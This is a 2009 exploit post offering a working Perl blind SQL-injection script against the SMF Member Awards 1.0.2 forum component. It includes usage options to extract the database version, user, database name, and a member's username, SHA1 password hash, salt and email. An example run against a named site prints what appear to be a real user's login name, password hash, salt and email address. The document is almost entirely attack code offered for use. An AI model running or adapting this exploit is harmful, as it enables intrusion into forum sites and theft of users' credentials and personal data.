smfma-sql.txt
Posted on 30 June 2009
------------------------------------------------------------------------- SMF Component Member Awards Blind SQL-injection Vulnerability ------------------------------------------------------------------------- author: eLwaux thanks: mailbrush, antichat.ru, uasc.org.ua ------------------------------------------------------------------------- usage: expl.pl http://site.com/smf/index.php ID_MEMBER TABLE_PREF {params} params: -v = get version() -u = get user() -d = get database() -an = get User Name (логин) -ap = get User Password (sha1 хеш) -as = get User Salt (Ñальт) -am = get User Mail (емейл) ------------------------------------------------------------------------- ( also you can modif script source: $SHOW_ALL = 1; == show brute-step result $SHOW_COUNT_REQ = 1 == show req's count $OPTIMAL = 1 == optimal brute ) ------------------------------------------------------------------------- example: http://scrubs.net.ru/cms/forum/index.php ] Host: scrubs.net.ru BAD answer = 'Ошибка' ] version() = 5 ] user() = us5729a@localhost ] database() = db ] id=1 NAME = zhbanito ] id=1 PASS = 4edd40635ac6fd263084d5ccc6fdc624fef3c932 ] id=1 SALT = fe81 ] id=1 MAIL = shpioner@mail.ru ------------------------------------------------------------------------- exploit (perl): #! /usr/bin/perl -w use IO::Socket; use warnings; #use threads; #use threads::shared; $SHOW_ALL = 1; $SHOW_COUNT_REQ = 1; $OPTIMAL = 1; print " SMF ] MemberAwards 1.0.2 exploit "; print " eLwaux(c)antichat 2009 "; if (!$ARGV[0]) { print " usage: ". " expl.pl http://site.com/smf/index.php ID_MEMBER TABLE_PREF {params} ". " params: ". " -v = get version() ". " -u = get user() ". " -d = get database() ". " -an = get User Name ". " -ap = get User Password ". " -as = get User Salt ". " -am = get User Mail "; exit(0); } my $Uid = (!$ARGV[1])?'1':$ARGV[1]; my $pref = (!$ARGV[2])?'smf_':$ARGV[2]; $link .= $ARGV[0].'?action=profile;sa=awardsMembers;u='.$Uid.';id={SQL}'; $getV = $getU = $getD = $getAN = $getAP = $getAS = $getAM = 0; for (my $i=0;$i<$#ARGV+1;$i++) { my $q = $ARGV[$i]; $getV = 1 if ($q eq '-v'); $getU = 1 if ($q eq '-u'); $getD = 1 if ($q eq '-d'); $getAN = 1 if ($q eq '-an'); $getAP = 1 if ($q eq '-ap'); $getAS = 1 if ($q eq '-as'); $getAM = 1 if ($q eq '-am'); } if ($link =~ /[http://]{0,}(.+?)/.+?{SQL}/) { $host = $1; } print ' ] Host: '.$host." "; $BAD = &getBadAnswer(); my $SFrom = 0; $SFrom = 41 if ($OPTIMAL == 1); my $SEnd = 0; $SEnd = 122 if ($OPTIMAL == 1); print " BAD answer = '$BAD' "; print ' ] version() = '.&getVersion(3,5)." " if ($getV==1); print ' ] user() = '.&getUser1($SFrom,$SEnd)." " if ($getU==1); # a..z print ' ] database() = '.&getDatabase($SFrom,$SEnd)." " if ($getD==1); # a..z print " "; print ' ] id='.$Uid.' NAME = '.&getAdminName($SFrom,$SEnd)." " if ($getAN==1); # 0..9,a..z print ' ] id='.$Uid.' PASS = '.&getAdminPass($SFrom,$SEnd)." " if ($getAP==1); # 0..9,a..z print ' ] id='.$Uid.' SALT = '.&getAdminSalt($SFrom,$SEnd)." " if ($getAS==1); # a..z print ' ] id='.$Uid.' MAIL = '.&getAdminMail($SFrom,$SEnd)." " if ($getAM==1); # a..z #print " "; print ' ] requests() = '.$SHOW_COUNT_REQ." "; # a..z exit(0); # get BAD answer sub getBadAnswer() { $BAD = "An Error Has Occurred!"; if (&req('1+and+substring(version(),1,1)=-1##+',1000) =~ /<meta name="description" content="(.+?)" .>/) { $BAD = $1; } return $BAD; } # GET VERSION() METHOD 1 -==--=--=-=-=-=-=-=-=-=-=-==-=--= # ascii(lower(substring(version(),x,1) WHERE IN (1,...,Y) sub getVersion($$) { for($i=$_[0]; $i<=$_[1]; $i++) { $r = &req('1+and+substring(version(),1,1)='.$i.'##+',1000); if ($r =~ /<meta name="description" content="(.+?)" .>/) { if (index($1,$BAD)==-1) { $SHOW_COUNT_REQ++ if ($SHOW_COUNT_REQ!=0); return $i; } } } return '<'.$_[0].' and >'.$_[1]; } # GET USER() METHOD 1 -==--=--=-=-=-=-=-=-=-=-=-==-=--= # ascii(lower(substring(user(),x,1) WHERE IN (1,...,Y) sub getUser1($$) { return &wherein($_[0],$_[1],'user()',0); } # GET DATABASE -==--=-==--=---=-==-=-=-=-=-=-=-=-=-==-=--= # ascii(lower(substring(database(),x,1) WHERE IN (1,...,Y) sub getDatabase($$) { return &wherein($_[0],$_[1],'database()',0); } # GET USER METHOD 2 -==--=--=-=-=-=-=-= # ascii(lower(substring(user(),1,1)))=Y sub getUser2($$) { $finish = 0; $s = 1; $user = ''; while ($finish!=1) { $gs = 0; print " user($s): " if ($SHOW_ALL==1); for($i=$_[0]; $i<=$_[1]; $i++) { if (&req('1+and+ascii(lower(substring(user(),'.$s.',1)))='.$i.'##+',1000) =~ /<meta name="description" content="(.+?)" .>/) { print " (".chr($i).") $i, " if ($SHOW_ALL==1); if (index($1,$BAD)==-1) { $user .= chr($i); print " found $s chars: $i = ".chr($i)." ($user) " if ($SHOW_ALL==1); $s++; $gs = 1; last; } } } print " " if ($SHOW_ALL==1); if ($gs == 0) { if ($user eq '') {return '<'.$_[0].' and >'.$_[1];} else {return $user;} } } } # GET ADMIN PASS_HASH -==--=-==--=---=-==-=-=-=-=-=-=-=-=-==-=--= #smf_members (ID_MEMBER,memberName,passwd,emailAddress,passwordSalt) # passwd = sha1(strtolower(username.password) # salt = substr(md5(mt_rand()), 0, 4) sub getAdminName($$) { return &wherein($_[0],$_[1],'memberName',1); } sub getAdminPass($$) { return &wherein($_[0],$_[1],'passwd',1); } sub getAdminSalt($$) { return &wherein($_[0],$_[1],'passwordSalt',1); } sub getAdminMail($$) { return &wherein($_[0],$_[1],'emailAddress',1); } # NEED FUNCTIONS -==--=--=-=-=-=-=-=-=-=-=-==-=--= sub req($$) { $SHOW_COUNT_REQ++ if ($SHOW_COUNT_REQ!=0); $l = $link; $l =~ s/{SQL}/$_[0]/; $r = "GET $l HTTP/1.1 Host: $host "; my $sock = sock(); print $sock $r; read($sock,my $a,$_[1]); return $a; } sub mlist($$) { $s = ''; for(my $i=$_[0];$i<=$_[1];$i++) {$s.=$i.',';} return substr($s,0,length($s)-1); } sub wherein($$$$) { # ,,,, (1=user,2=else) print " ] $_[2] " if ($SHOW_ALL==1); my $WHEREIN = 10; # WHERE IN (1,2,3,4,5,6,7,8,9,10) my $res = ''; my $c = 1; my $fmin = $_[0]; my $fmax = $_[1]; while ($c>=1) { my $gs = 0; for (my $i=0;$i<=int(($fmax-$fmin)/$WHEREIN);$i++){ my $s1 = int($fmin+$i*$WHEREIN); my $s2 = int(($s1+$WHEREIN)>$fmax)?$fmax:($s1+$WHEREIN); my $ch = ($_[3]==1)?&getUBRUTE($s1,$s2,$c,$_[2]):&getBRUTE($s1,$s2,$c,$_[2]); if ($ch ne '?') { $res.=$ch; print " $_[2]($c) = $ch [$res] " if ($SHOW_ALL==1); $c++; $gs = 1; last; } } if ($gs == 0) { $c=-1; return $res; last; } } } sub getBRUTE($$$$) { #start,end,pos,text print ' '.$_[0].'...'.$_[1].' ['.$_[2]."] " if ($SHOW_ALL==1); if (&req('1+and+ascii(lower(substring('.$_[3].','.$_[2].',1)))+in+('.&mlist($_[0],$_[1]).')%23+',1000) =~ /<meta name="description" content="(.+?)" .>/) { if (index($1,$BAD)==-1) { for(my $i=$_[0]; $i<=$_[1]; $i++) { if (&req('1+and+ascii(lower(substring('.$_[3].','.$_[2].',1)))='.$i.'%23+',1000) =~ /<meta name="description" content="(.+?)" .>/) { if (index($1,$BAD)==-1) { return chr($i); last; } } } } } return '?'; } sub getUBRUTE($$$$) { #start,end,pos,text print ' ['.$_[2].'] '.$_[0].'...'.$_[1]." " if ($SHOW_ALL==1); if (&req('1+and+(%23)%0Aselect+ascii(lower(substring('.$_[3].','.$_[2].',1)))+from+'.$pref.'members+where+ID_MEMBER='.$Uid.')+in+('.&mlist($_[0],$_[1]).')%23+',1000) =~ /<meta name="description" content="(.+?)" .>/) { if (index($1,$BAD)==-1) { for(my $i=$_[0]; $i<=$_[1]; $i++) { if (&req('1+and+(%23)%0Aselect+ascii(lower(substring('.$_[3].','.$_[2].',1)))+from+'.$pref.'members+where+ID_MEMBER='.$Uid.')='.$i.'%23+',1000) =~ /<meta name="description" content="(.+?)" .>/) { if (index($1,$BAD)==-1) { return chr($i); last; } } } } } return '?'; } sub sock { my $sock; do { $sock = new IO::Socket::INET ( PeerAddr => $host, PeerPort => 80, PeerProto => 'tcp', TimeOut => 10 ) or print " ] connection error! "; } while (!$sock); return $sock; } -------------------------------------------------------------------------
